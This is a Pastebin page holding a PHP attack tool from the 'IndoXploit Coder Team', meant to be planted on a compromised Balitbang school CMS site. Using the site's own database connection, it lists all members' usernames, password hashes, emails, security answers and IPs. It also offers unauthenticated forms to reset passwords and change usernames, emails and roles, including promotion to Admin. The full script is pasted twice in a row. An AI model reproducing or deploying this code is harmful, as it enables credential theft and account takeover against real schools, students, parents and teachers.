API tools faq
paste
Advertisement
Falcon-G21

Balitbang Member Viewer v1

Falcon-G21
Dec 3rd, 2015
256
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 14.48 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. // global setting
  3. //$email = "aiharaanwaru01@gmail.com"; // email mu, fungsi menerima pesan berupa user dan password
  4. $evil = "koneksi.php"; // ganti dengan lokasi file koneksi.php - misal /functions/koneksi.php atau ../function/koneksi.php sesuai letak file ini
  5. include "$evil";
  6. //===============================================
  7. $hal=$_GET['hal'];
  8. $ket=$_GET['ket'];
  9. echo "<html><title> IndoXploit </title>";
  10. echo "<body bgcolor='#000000' text='#00ff00'>";
  11. echo "<center><font class='ari12' style='color:#00ff00'><b>IndoXploit Coder Team<br /> Balitbang MEMBERS View <br /> By Aihara Anwaru [ Falcon-G21 Team Dark ]</b></font></center><br />";
  12.  
  13. if ($ket=='') $ket='Tamu';
  14. $brs=30;
  15. $kol=10;
  16.   $byk_result1=mysql_query("select * from t_member where ket='". mysql_escape_string($ket)."'");
  17.    
  18.   $byk=mysql_num_rows($byk_result1);
  19.   if ($byk<=$brs)
  20.     $jml=0;
  21.   else
  22.   {
  23.     $jml=floor($byk / $brs);
  24.     $sisa= $byk % $brs;
  25.     if ($sisa!=0)
  26.         $jml++;
  27.   }
  28.   if ($hal=="")
  29.     $awal=0;
  30.   else
  31.     $awal=$brs*($hal-1);
  32.  
  33.   if ($hal=="") $hal=1;
  34.   $back=$hal-1;
  35.   $next=$hal+1;
  36.   if ($hal==1) $back=1;
  37.   if ($hal==$jml) $next=$jml;
  38.   $mulai=1;
  39.   $batas=$jml;
  40.   if ($jml>$kol)
  41.     $batas=$kol;
  42.  
  43.   if ($hal>$kol) {
  44.   $mulai=1+$hal-$kol;
  45.   $batas=$hal;
  46.   }
  47.  
  48.   $query = "SELECT * from t_member where ket='". mysql_escape_string($ket)."' order by status,nama LIMIT ".$awal.",".$brs."";
  49.   $q= mysql_query ($query) or die (mysql_error());
  50.   $n = mysql_num_rows ($q);
  51.   if ($ket=='Tamu') $s1='selected';
  52.   elseif ($ket=='Alumni') $s2='selected';
  53.   elseif ($ket=='Siswa') $s3='selected';
  54.   elseif ($ket=='Orang Tua') $s4='selected';
  55.   elseif ($ket=='Admin') $s6='selected';
  56.   elseif ($ket=='Guru') $s5='selected';
  57.   echo "<center><a href='?indo=xploit'>Home</a> | <a href='?indo=xploit&ket=Tamu'>Tamu</a> | <a href='?indo=xploit&ket=Alumni'>Alumni</a> | <a href='?indo=xploit&ket=Siswa'>Siswa</a> | <a href='?indo=xploit&ket=Orang Tua'>Orang Tua</a> | <a href='?indo=xploit&ket=Guru'>Guru</a> | <a href='?indo=xploit&ket=Admin'>Admin</a><br /><br />  
  58.  ";
  59.    
  60.     if ($jml!=0) {
  61.     echo "<font class='ver10'><a href='member.php?indo=xploit&ket=$ket&hal=1' class=ver10 title='Page 1'>First </a> <a href='member.php?indo=xploit&ket=$ket&hal=$back' class='ver10' title='$back'>Back </a> |";
  62.     for($i=$mulai;$i<=$batas;$i++)
  63.     {
  64.         if ($i==$hal)
  65.     echo "<b><a href='member.php?indo=xploit&ket=$ket&hal=$i' class='ver10' title='Page $i from $byk Data'> $i </a></b> |";    
  66.         else
  67.         echo "<a href='member.php?indo=xploit&ket=$ket&hal=$i'  class='ver10' title='Page $i from $byk Data'> $i </a> |";      
  68.     }
  69.     echo "<a href='member.php?indo=xploit&ket=$ket&hal=$next' class='ver10' title='$next'> Next</a>
  70.     <a href='member.php?indo=xploit&ket=$ket&hal=$jml' class='ver10' title='Page $jml'> Last</a></font></center>";
  71.   }
  72.   while($row=mysql_fetch_array($q)) {
  73.         $file ="../member/profil/gb$row[userid].jpg";
  74.         $gb="<a href='#' title='$row[nama]'><img src='../member/profil/kosong.jpg' width='60' height='75' align=left></a>";
  75.         if (file_exists(''.$file.'')) {
  76.             $gb="<a href='#' title='$row[nama]'><img src='$file' width='60' height='75' align=left></a>";
  77.         }
  78.         if ($row[kelamin]=="m") $kelamin="Male";
  79.         else $kelamin="Female";
  80.        
  81.         $tgllogin= date("d-m-Y s:i", strtotime($row[tgl_login]));
  82.         $v="<b>Valid ($row[17])</b>";
  83.         $valid="";
  84.     $warna="#990000";
  85.         if ($row[status]=='0') {$v="<font color='$warna'><b>No Valid ($row[17])</b></font>";}
  86.       $valid="$v";
  87.     $br = "<br />";
  88.         echo "</center>
  89.    Userid :<b> $row[0] </b> $br
  90.    Status  : $valid $br
  91.    Name: <b> $row[1] </b> $br
  92.    Username :<b> $row[11] </b> - <a href='?xploit=change_user&id=$row[0]'>Change Username</a> $br
  93.    Password : <b> $row[12] </b> - <a href='?xploit=change_pass&id=$row[0]'>Change Password</a> $br
  94.    E-mail : <b> $row[13] </b> - <a href='?xploit=change_email&id=$row[0]'>Change E-mail</a> $br
  95.    Security Type : <b> $row[14] </b> $br
  96.    Security Answer :<b> $row[15] </b> $br
  97.    Kategori : <b> $row[16] </b> $br
  98.    ID Type : <b> $row[21] </b> - <a href='?xploit=change_IT&id=$row[0]'>Change ID Type</a> $br
  99.    Point : <b> $row[24] </b> $br
  100.    Status Login : <b> $row[25] </b> $br
  101.    Total Login : <b> $row[26] </b> $br
  102.    IP : <b> $row[27] </b> $br $br";
  103.     }        
  104. if($_GET['xploit']== 'change_pass'){
  105. include "$evil";
  106. $kode=$_GET['id'];
  107. echo "<form action='' method='post'>Pass : <input type='text' name='aru'><input type='submit' name='ai0' value='Change'></form>";
  108. if(isset($_POST['ai0'])){
  109.  $mimi = $_POST['aru'];
  110.     $pass = rand(111111,999999);
  111.   $blank = "$mimi$pass";
  112.     $password=md5($blank);
  113.     $query="update t_member set password='$password' where userid='". mysql_escape_string($kode)."'";
  114.     $result = mysql_query($query);
  115.     $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
  116.     $result = mysql_query($query);
  117.     $row = mysql_fetch_array($result);
  118.     //if(!@mail($email,"Konfirmasi Password","Password Baru Anda= $blank<br> Terima kasih webmaster $webhost","From: $webmail")) {
  119. //     echo "Gagal kirim email<br>";
  120. //  }
  121.    
  122.     echo "<font>Data Password member telah diupdate. Menjadi :<b> $blank</b><br>";
  123.  
  124. }  
  125.   }
  126. if($_GET['xploit']== 'change_user'){
  127. include "$evil";
  128. $kode=$_GET['id'];
  129. echo "<form action='' method='post'>User : <input type='text' name='yuser'><input type='submit' name='ai1' value='Change'></form>";
  130. if(isset($_POST['ai1'])){
  131. $xuser=$_POST['yuser'];
  132.     $query="update t_member set username='$xuser' where userid='". mysql_escape_string($kode)."'";
  133.     $result = mysql_query($query);
  134.     $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
  135.     $result = mysql_query($query);
  136.     $row = mysql_fetch_array($result);
  137.     echo "Data Username member telah diupdate. Menjadi :  <b> $row[11] </b><br>";
  138.   }
  139. }
  140. if($_GET['xploit']== 'change_IT'){
  141. include "$evil";
  142. $kode=$_GET['id'];
  143. echo "<form action='' method='post'>Change ID Type To : <select name='xxx'><option value='Tamu'>Tamu</option><option value='Alumni'>Alumni</option><option value='Siswa'>Siswa</option><option value='Orang Tua'>Orang Tua</option><option value='Guru'>Guru</option><option value='Admin'>Admin</option></select><input type='submit' name='ai2' value='Change'></form>";
  144. if(isset($_POST['ai2'])){
  145. $plo=$_POST['xxx'];
  146.     $query="update t_member set ket='$plo' where userid='". mysql_escape_string($kode)."'";
  147.     $result = mysql_query($query);
  148.     $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
  149.     $result = mysql_query($query);
  150.     $row = mysql_fetch_array($result);
  151.     echo "Data ID Type member telah diupdate. Menjadi :  <b> $row[21] </b><br>";
  152. }
  153. }
  154. if($_GET['xploit']== 'change_email'){
  155. include "$evil";
  156. $kode=$_GET['id'];
  157. echo "<form action='' method='post'>E-mail : <input type='text' name='sumail'><input type='submit' name='ai3' value='Change'></form>";
  158. if(isset($_POST['ai3'])){
  159. $noob=$_POST['sumail'];
  160.     $query="update t_member set email='$noob' where userid='". mysql_escape_string($kode)."'";
  161.     $result = mysql_query($query);
  162.     $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
  163.     $result = mysql_query($query);
  164.     $row = mysql_fetch_array($result);
  165.     echo "Data E-mail member telah diupdate. Menjadi :  <b> $row[13] </b><br>";
  166.   }
  167. }
  168. ?><?php
  169. // global setting
  170. //$email = "aiharaanwaru01@gmail.com"; // email mu, fungsi menerima pesan berupa user dan password
  171. $evil = "koneksi.php"; // ganti dengan lokasi file koneksi.php - misal /functions/koneksi.php atau ../function/koneksi.php sesuai letak file ini
  172. include "$evil";
  173. //===============================================
  174. $hal=$_GET['hal'];
  175. $ket=$_GET['ket'];
  176. echo "<html><title> IndoXploit </title>";
  177. echo "<body bgcolor='#000000' text='#00ff00'>";
  178. echo "<center><font class='ari12' style='color:#00ff00'><b>IndoXploit Coder Team<br /> Balitbang MEMBERS View <br /> By Aihara Anwaru [ Falcon-G21 Team Dark ]</b></font></center><br />";
  179.  
  180. if ($ket=='') $ket='Tamu';
  181. $brs=30;
  182. $kol=10;
  183.   $byk_result1=mysql_query("select * from t_member where ket='". mysql_escape_string($ket)."'");
  184.    
  185.   $byk=mysql_num_rows($byk_result1);
  186.   if ($byk<=$brs)
  187.     $jml=0;
  188.   else
  189.   {
  190.     $jml=floor($byk / $brs);
  191.     $sisa= $byk % $brs;
  192.     if ($sisa!=0)
  193.         $jml++;
  194.   }
  195.   if ($hal=="")
  196.     $awal=0;
  197.   else
  198.     $awal=$brs*($hal-1);
  199.  
  200.   if ($hal=="") $hal=1;
  201.   $back=$hal-1;
  202.   $next=$hal+1;
  203.   if ($hal==1) $back=1;
  204.   if ($hal==$jml) $next=$jml;
  205.   $mulai=1;
  206.   $batas=$jml;
  207.   if ($jml>$kol)
  208.     $batas=$kol;
  209.  
  210.   if ($hal>$kol) {
  211.   $mulai=1+$hal-$kol;
  212.   $batas=$hal;
  213.   }
  214.  
  215.   $query = "SELECT * from t_member where ket='". mysql_escape_string($ket)."' order by status,nama LIMIT ".$awal.",".$brs."";
  216.   $q= mysql_query ($query) or die (mysql_error());
  217.   $n = mysql_num_rows ($q);
  218.   if ($ket=='Tamu') $s1='selected';
  219.   elseif ($ket=='Alumni') $s2='selected';
  220.   elseif ($ket=='Siswa') $s3='selected';
  221.   elseif ($ket=='Orang Tua') $s4='selected';
  222.   elseif ($ket=='Admin') $s6='selected';
  223.   elseif ($ket=='Guru') $s5='selected';
  224.   echo "<center><a href='?indo=xploit'>Home</a> | <a href='?indo=xploit&ket=Tamu'>Tamu</a> | <a href='?indo=xploit&ket=Alumni'>Alumni</a> | <a href='?indo=xploit&ket=Siswa'>Siswa</a> | <a href='?indo=xploit&ket=Orang Tua'>Orang Tua</a> | <a href='?indo=xploit&ket=Guru'>Guru</a> | <a href='?indo=xploit&ket=Admin'>Admin</a><br /><br />  
  225.  ";
  226.    
  227.     if ($jml!=0) {
  228.     echo "<font class='ver10'><a href='member.php?indo=xploit&ket=$ket&hal=1' class=ver10 title='Page 1'>First </a> <a href='member.php?indo=xploit&ket=$ket&hal=$back' class='ver10' title='$back'>Back </a> |";
  229.     for($i=$mulai;$i<=$batas;$i++)
  230.     {
  231.         if ($i==$hal)
  232.     echo "<b><a href='member.php?indo=xploit&ket=$ket&hal=$i' class='ver10' title='Page $i from $byk Data'> $i </a></b> |";    
  233.         else
  234.         echo "<a href='member.php?indo=xploit&ket=$ket&hal=$i'  class='ver10' title='Page $i from $byk Data'> $i </a> |";      
  235.     }
  236.     echo "<a href='member.php?indo=xploit&ket=$ket&hal=$next' class='ver10' title='$next'> Next</a>
  237.     <a href='member.php?indo=xploit&ket=$ket&hal=$jml' class='ver10' title='Page $jml'> Last</a></font></center>";
  238.   }
  239.   while($row=mysql_fetch_array($q)) {
  240.         $file ="../member/profil/gb$row[userid].jpg";
  241.         $gb="<a href='#' title='$row[nama]'><img src='../member/profil/kosong.jpg' width='60' height='75' align=left></a>";
  242.         if (file_exists(''.$file.'')) {
  243.             $gb="<a href='#' title='$row[nama]'><img src='$file' width='60' height='75' align=left></a>";
  244.         }
  245.         if ($row[kelamin]=="m") $kelamin="Male";
  246.         else $kelamin="Female";
  247.        
  248.         $tgllogin= date("d-m-Y s:i", strtotime($row[tgl_login]));
  249.         $v="<b>Valid ($row[17])</b>";
  250.         $valid="";
  251.     $warna="#990000";
  252.         if ($row[status]=='0') {$v="<font color='$warna'><b>No Valid ($row[17])</b></font>";}
  253.       $valid="$v";
  254.     $br = "<br />";
  255.         echo "</center>
  256.    Userid :<b> $row[0] </b> $br
  257.    Status  : $valid $br
  258.    Name: <b> $row[1] </b> $br
  259.    Username :<b> $row[11] </b> - <a href='?xploit=change_user&id=$row[0]'>Change Username</a> $br
  260.    Password : <b> $row[12] </b> - <a href='?xploit=change_pass&id=$row[0]'>Change Password</a> $br
  261.    E-mail : <b> $row[13] </b> - <a href='?xploit=change_email&id=$row[0]'>Change E-mail</a> $br
  262.    Security Type : <b> $row[14] </b> $br
  263.    Security Answer :<b> $row[15] </b> $br
  264.    Kategori : <b> $row[16] </b> $br
  265.    ID Type : <b> $row[21] </b> - <a href='?xploit=change_IT&id=$row[0]'>Change ID Type</a> $br
  266.    Point : <b> $row[24] </b> $br
  267.    Status Login : <b> $row[25] </b> $br
  268.    Total Login : <b> $row[26] </b> $br
  269.    IP : <b> $row[27] </b> $br $br";
  270.     }        
  271. if($_GET['xploit']== 'change_pass'){
  272. include "$evil";
  273. $kode=$_GET['id'];
  274. echo "<form action='' method='post'>Pass : <input type='text' name='aru'><input type='submit' name='ai0' value='Change'></form>";
  275. if(isset($_POST['ai0'])){
  276.  $mimi = $_POST['aru'];
  277.     $pass = rand(111111,999999);
  278.   $blank = "$mimi$pass";
  279.     $password=md5($blank);
  280.     $query="update t_member set password='$password' where userid='". mysql_escape_string($kode)."'";
  281.     $result = mysql_query($query);
  282.     $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
  283.     $result = mysql_query($query);
  284.     $row = mysql_fetch_array($result);
  285.     //if(!@mail($email,"Konfirmasi Password","Password Baru Anda= $blank<br> Terima kasih webmaster $webhost","From: $webmail")) {
  286. //     echo "Gagal kirim email<br>";
  287. //  }
  288.    
  289.     echo "<font>Data Password member telah diupdate. Menjadi :<b> $blank</b><br>";
  290.  
  291. }  
  292.   }
  293. if($_GET['xploit']== 'change_user'){
  294. include "$evil";
  295. $kode=$_GET['id'];
  296. echo "<form action='' method='post'>User : <input type='text' name='yuser'><input type='submit' name='ai1' value='Change'></form>";
  297. if(isset($_POST['ai1'])){
  298. $xuser=$_POST['yuser'];
  299.     $query="update t_member set username='$xuser' where userid='". mysql_escape_string($kode)."'";
  300.     $result = mysql_query($query);
  301.     $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
  302.     $result = mysql_query($query);
  303.     $row = mysql_fetch_array($result);
  304.     echo "Data Username member telah diupdate. Menjadi :  <b> $row[11] </b><br>";
  305.   }
  306. }
  307. if($_GET['xploit']== 'change_IT'){
  308. include "$evil";
  309. $kode=$_GET['id'];
  310. echo "<form action='' method='post'>Change ID Type To : <select name='xxx'><option value='Tamu'>Tamu</option><option value='Alumni'>Alumni</option><option value='Siswa'>Siswa</option><option value='Orang Tua'>Orang Tua</option><option value='Guru'>Guru</option><option value='Admin'>Admin</option></select><input type='submit' name='ai2' value='Change'></form>";
  311. if(isset($_POST['ai2'])){
  312. $plo=$_POST['xxx'];
  313.     $query="update t_member set ket='$plo' where userid='". mysql_escape_string($kode)."'";
  314.     $result = mysql_query($query);
  315.     $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
  316.     $result = mysql_query($query);
  317.     $row = mysql_fetch_array($result);
  318.     echo "Data ID Type member telah diupdate. Menjadi :  <b> $row[21] </b><br>";
  319. }
  320. }
  321. if($_GET['xploit']== 'change_email'){
  322. include "$evil";
  323. $kode=$_GET['id'];
  324. echo "<form action='' method='post'>E-mail : <input type='text' name='sumail'><input type='submit' name='ai3' value='Change'></form>";
  325. if(isset($_POST['ai3'])){
  326. $noob=$_POST['sumail'];
  327.     $query="update t_member set email='$noob' where userid='". mysql_escape_string($kode)."'";
  328.     $result = mysql_query($query);
  329.     $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
  330.     $result = mysql_query($query);
  331.     $row = mysql_fetch_array($result);
  332.     echo "Data E-mail member telah diupdate. Menjadi :  <b> $row[13] </b><br>";
  333.   }
  334. }
  335. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!